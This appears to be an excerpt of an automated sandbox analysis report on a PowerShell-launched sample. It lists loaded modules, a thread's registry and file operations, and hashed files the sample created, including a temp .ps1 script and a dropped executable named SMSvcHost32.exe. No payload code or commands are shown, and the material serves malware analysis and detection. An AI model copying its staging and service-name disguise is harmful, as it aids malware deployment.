| tzres.dll | 0x15045710000 | 0x15045710fff | Memory Mapped File | rw |
|
|
|
- |
| tzres.dll.mui | 0x15045710000 | 0x15045718fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000015045710000 | 0x15045710000 | 0x1504571ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000015045740000 | 0x15045740000 | 0x1504574ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000015045750000 | 0x15045750000 | 0x150458d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000150458e0000 | 0x150458e0000 | 0x15045a60fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000015045a70000 | 0x15045a70000 | 0x15046e6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000015046e70000 | 0x15046e70000 | 0x15046f72fff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x15046f80000 | 0x1504705cfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000015047060000 | 0x15047060000 | 0x1504706ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000015047070000 | 0x15047070000 | 0x1505f06ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x1505f070000 | 0x1505f3a6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000001505f3b0000 | 0x1505f3b0000 | 0x1505f4affff | Private Memory | rw |
|
|
|
- |
| private_0x000001505f5a0000 | 0x1505f5a0000 | 0x1505f5affff | Private Memory | rwx |
|
|
|
- |
| private_0x000001505f5b0000 | 0x1505f5b0000 | 0x1505f6affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000001505f6b0000 | 0x1505f6b0000 | 0x1505faaafff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007df5fff90000 | 0x7df5fff90000 | 0x7ff5fff8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7f4470000 | 0x7ff7f4470000 | 0x7ff7f447ffff | Private Memory | rwx |
|
|
|
- |
| private_0x00007ff7f4480000 | 0x7ff7f4480000 | 0x7ff7f451ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00007ff7f4520000 | 0x7ff7f4520000 | 0x7ff7f461ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7f4620000 | 0x7ff7f4620000 | 0x7ff7f4642fff | Pagefile Backed Memory | r |
|
|
|
- |
| powershell.exe | 0x7ff7f50e0000 | 0x7ff7f5157fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffb98ae0000 | 0x7ffb98ae0000 | 0x7ffb98aeffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98af0000 | 0x7ffb98af0000 | 0x7ffb98afffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98b00000 | 0x7ffb98b00000 | 0x7ffb98b8ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98b90000 | 0x7ffb98b90000 | 0x7ffb98bfffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c00000 | 0x7ffb98c00000 | 0x7ffb98c3ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c40000 | 0x7ffb98c40000 | 0x7ffb98c4ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c50000 | 0x7ffb98c50000 | 0x7ffb98c5ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c60000 | 0x7ffb98c60000 | 0x7ffb98c6ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c70000 | 0x7ffb98c70000 | 0x7ffb98c7ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c80000 | 0x7ffb98c80000 | 0x7ffb98c8ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c90000 | 0x7ffb98c90000 | 0x7ffb98c9ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98ca0000 | 0x7ffb98ca0000 | 0x7ffb98caffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98cb0000 | 0x7ffb98cb0000 | 0x7ffb98cbffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98cc0000 | 0x7ffb98cc0000 | 0x7ffb98ccffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98cd0000 | 0x7ffb98cd0000 | 0x7ffb98cdffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98ce0000 | 0x7ffb98ce0000 | 0x7ffb98ceffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98cf0000 | 0x7ffb98cf0000 | 0x7ffb98cfffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d00000 | 0x7ffb98d00000 | 0x7ffb98d0ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d10000 | 0x7ffb98d10000 | 0x7ffb98d1ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d20000 | 0x7ffb98d20000 | 0x7ffb98d2ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d30000 | 0x7ffb98d30000 | 0x7ffb98d3ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d40000 | 0x7ffb98d40000 | 0x7ffb98d4ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d50000 | 0x7ffb98d50000 | 0x7ffb98d5ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d60000 | 0x7ffb98d60000 | 0x7ffb98d6ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d70000 | 0x7ffb98d70000 | 0x7ffb98d7ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d80000 | 0x7ffb98d80000 | 0x7ffb98d8ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d90000 | 0x7ffb98d90000 | 0x7ffb98d9ffff | Private Memory | - |
|
|
|
- |
| system.configuration.ni.dll | 0x7ffbf24a0000 | 0x7ffbf25bffff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7ffbf25e0000 | 0x7ffbf2641fff | Memory Mapped File | rwx |
|
|
|
- |
| clrjit.dll | 0x7ffbf2650000 | 0x7ffbf2754fff | Memory Mapped File | rwx |
|
|
|
- |
| system.diagnostics.tracing.ni.dll | 0x7ffbf2760000 | 0x7ffbf2764fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x7ffbf2770000 | 0x7ffbf27bcfff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7ffbf27c0000 | 0x7ffbf2896fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7ffbf28a0000 | 0x7ffbf28cbfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x7ffbf28d0000 | 0x7ffbf2a2efff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7ffbf2a30000 | 0x7ffbf2b91fff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7ffbf2ba0000 | 0x7ffbf3439fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.management.infrastructure.ni.dll | 0x7ffbf3440000 | 0x7ffbf34dbfff | Memory Mapped File | rwx |
|
|
|
- |
| system.numerics.ni.dll | 0x7ffbf34e0000 | 0x7ffbf352ffff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7ffbf3530000 | 0x7ffbf5538fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7ffbf5590000 | 0x7ffbf563bfff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7ffbf5640000 | 0x7ffbf5fc0fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7ffbf5fd0000 | 0x7ffbf6be3fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7ffbf6bf0000 | 0x7ffbf80b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr120_clr0400.dll | 0x7ffbf8150000 | 0x7ffbf8246fff | Memory Mapped File | rwx |
|
|
|
- |
| clr.dll | 0x7ffbf8250000 | 0x7ffbf8bddfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7ffbf8be0000 | 0x7ffbf8c77fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7ffbf8c80000 | 0x7ffbf8ce7fff | Memory Mapped File | rwx |
|
|
|
- |
| wldp.dll | 0x7ffc02db0000 | 0x7ffc02dbbfff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7ffc04bd0000 | 0x7ffc04bedfff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7ffc07360000 | 0x7ffc0736bfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffc07370000 | 0x7ffc07379fff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7ffc0a020000 | 0x7ffc0a031fff | Memory Mapped File | rwx |
|
|
|
- |
| davhlpr.dll | 0x7ffc0a050000 | 0x7ffc0a05bfff | Memory Mapped File | rwx |
|
|
|
- |
| davclnt.dll | 0x7ffc0a060000 | 0x7ffc0a07ffff | Memory Mapped File | rwx |
|
|
|
- |
| ntlanman.dll | 0x7ffc0a080000 | 0x7ffc0a095fff | Memory Mapped File | rwx |
|
|
|
- |
| drprov.dll | 0x7ffc0a0a0000 | 0x7ffc0a0aafff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7ffc0a0b0000 | 0x7ffc0a0cafff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x7ffc0ba70000 | 0x7ffc0ba85fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffc11060000 | 0x7ffc1106bfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc11260000 | 0x7ffc11293fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc115d0000 | 0x7ffc115e6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc116f0000 | 0x7ffc116fafff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc118d0000 | 0x7ffc118fcfff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffc11a60000 | 0x7ffc11ab5fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc11b80000 | 0x7ffc11ba8fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc11c50000 | 0x7ffc11c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc11c60000 | 0x7ffc11caafff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc11cb0000 | 0x7ffc11cc3fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc11cd0000 | 0x7ffc11cdefff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffc11f60000 | 0x7ffc125a3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc125b0000 | 0x7ffc12664fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc12670000 | 0x7ffc126d9fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc126e0000 | 0x7ffc12722fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc12840000 | 0x7ffc12a27fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffc12c40000 | 0x7ffc1419efff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc141a0000 | 0x7ffc14325fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc145f0000 | 0x7ffc1469cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc14700000 | 0x7ffc1481bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc14820000 | 0x7ffc1485afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffc14860000 | 0x7ffc148b1fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc148c0000 | 0x7ffc14b3cfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffc14bb0000 | 0x7ffc14cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc14d10000 | 0x7ffc14e65fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc152a0000 | 0x7ffc15360fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x7ffc15400000 | 0x7ffc15407fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc15480000 | 0x7ffc154dafff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc154e0000 | 0x7ffc15586fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc15590000 | 0x7ffc1562cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 115 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\bwaykzvy.uyx.ps1 | 0.00 KB |
MD5:
c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b SSDeep: 3:U:U |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp | 245.50 KB |
MD5:
3cf7a348da34fbb5b7a77f49e6219a76
SHA1: ace28cb17ef956527798c4dc77c50e5559c74cdb SHA256: 1eceed1163da873e4988bd7b232c751a3f7699035e458db2abf8c4483a627409 SSDeep: 6144:22C5kIiyCoHmrokIR7CcGIt11H+9cfKa:2Z5zPGrokIR77FhH+T |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | 233.00 KB |
MD5:
b976604a3d1b7ad8fd551e834e9403b5
SHA1: 6ac5ccc2b3bd1cffaab41b35b7b70ca42ba7a3da SHA256: e8c89103d3c1c23f7bad82c61d563d842f796a900ce201953d6339bd2af917eb SSDeep: 6144:wS3Qz86ucBW5wLr9QR9z5b+KNXnE8RAr2WJSfjEi:wSztXw/90zZ+wGq |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ac90668-b7fb-46d6-80e6-01a947284e18 | 1.16 KB |
MD5:
9832b59b183bb6318e62f1385d345c6d
SHA1: 54b856a180fb3723403f9aad24ca548de63dc376 SHA256: bfd60204585f1603ee9faac7c44adb9fcd6fa56b7748f03ecb1a9beaa7c56ea1 SSDeep: 24:WM83yV+ty+qXlIZXxf/DXdQXPZX3X6S+Z+Wz+q:BSy8PilIhNTWPhn6lgDq |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 | 10.76 KB |
MD5:
8845f276e426accd51223008b6aed4bf
SHA1: c9fa81aa57e7c32c4bcefd33788967cc3170fe91 SHA256: 72831bc6962c8017ea71abc038a8f60e79976ebaf05d363c80f32c975a55d0d9 SSDeep: 192:8wUOJGqwAf5CBbXuQuxs0B8HX64MnENxUyrTEAsr9jQ0uwm/CgGZYySo0nbSRNNo:8wUOJGqwARCBbXxss0B8364MnENxUyr3 |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f | 1.77 KB |
MD5:
c9fa9488f8854802c6f5eff3234d8a8a
SHA1: 8b9029e83008d74b8c5414a2ef064629a340c9ae SHA256: 12bd362291f72f2c2e7756742b7377549d13d5bf231455d23ef250c5bdf18121 SSDeep: 24:WM83yV+ty+ZcnPZcMGcZcFc7Vc4vcEvcXc6c4ncSZncJ5S+Z+Wz+q:BSy8PiPiMLim64EEEM34cYcJ5lgDq |
|
|
| c:\users\nd9e1fyi\appdata\local\microsoft\windows\inetcache\counters.dat | 0.12 KB |
MD5:
637026929ebd81f12ba900b120be2e6c
SHA1: b22c135f30e37e86172e00683cee428feb7ac073 SHA256: 18116a5c09285f02aaa01e297f37ceee97acdbff8035b34c7ccf1de9a449bc61 SSDeep: 3:kTltB:elt |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | 19.46 KB |
MD5:
c9c50ae0691385cfaacd3e92f289bf6b
SHA1: bdb5036049e55bc7f386f70a0fc3ee6250ef0d46 SHA256: d9184ecb0e61d52465ed927b1c9cacd90c10a57b2a2c82cded2f2f5b811067fd SSDeep: 384:yEsbXrBaxb7k02/0pdIGs+VW6lIZFi7xal0Rxfk2/i4JB9tG+sQRwuA01Jn6ioKA:1F03+oYG |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | 19.46 KB |
MD5:
7f393766e0f6225d98acdb893a5f418c
SHA1: cd052ac4835f207edbbe9e9281e92d87b3b4454b SHA256: aa53cc5fab633b04729595c31a1e5cfb40f52f9af6721db5483e2c4b3513d8a5 SSDeep: 384:yEsbArBaxb7k02/0pdIGs+VW6lIZFi7xal0Rxfk2/i4JB9tG+sQRwuA01Jn6ioKA:aF03+oYG |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | 19.46 KB |
MD5:
6882238308f271219ef31923f15890df
SHA1: 814f24ecd5b95562b2a4704f2ff988ff8737d398 SHA256: 1dc600b2e870db4bc42c23305c50a60810691341e4d951887c66a8e2371977ac SSDeep: 384:yEsbArBxxb7k02/0pdIGs+VW6lZZFi7xal0Rxfk2/i4JB9tG+sQRwuA01Jn6ioKA:5Y03+oYG |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | 19.46 KB |
MD5:
40e29531e81493d6e680e38c3ace3714
SHA1: ee078721826355eae9ef0e96d476edf307d54046 SHA256: 57b17ab692375358c25c34caf15c1f0b4705a67ea5bedbd852fdec393a40eac0 SSDeep: 384:yEsbArBxxb7k02/0pdIGs+VW6lIZFi7xal0Rxfk2/i4JB9tG+sQRwuA01Jn6ioKA:5F03+oYG |
|
|
Threads
Thread 0xff4
696
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN, value_name = ServiceStackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN, value_name = ServiceStackVersion, data = 3.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\typesv3.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\Transcription |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Winevt\Publishers\{5037b0a0-3a31-5cd2-ff19-103e9f160a74} |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = TZI, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Display, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Display, data = @tzres.dll,-320, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Std, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Std, data = @tzres.dll,-322, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Dlt, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Dlt, data = @tzres.dll,-321, type = REG_SZ |
|
1 | |
| Module | Load | module_name = C:\Windows\system32\en-US\tzres.dll.mui, base_address = 0x15045710001 |
|
3 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| File | Create Pipe | pipe_name = \device\namedpipe\pshost.131891832590894829.4088.defaultappdomain.powershell, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_FIRST_PIPE_INSTANCE, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 |
|
1 | |
| File | Get Info | type = file_type |
|
1 | |
| Environment | Get Environment String | name = PathEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Set Environment String | name = PathEXT, value = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
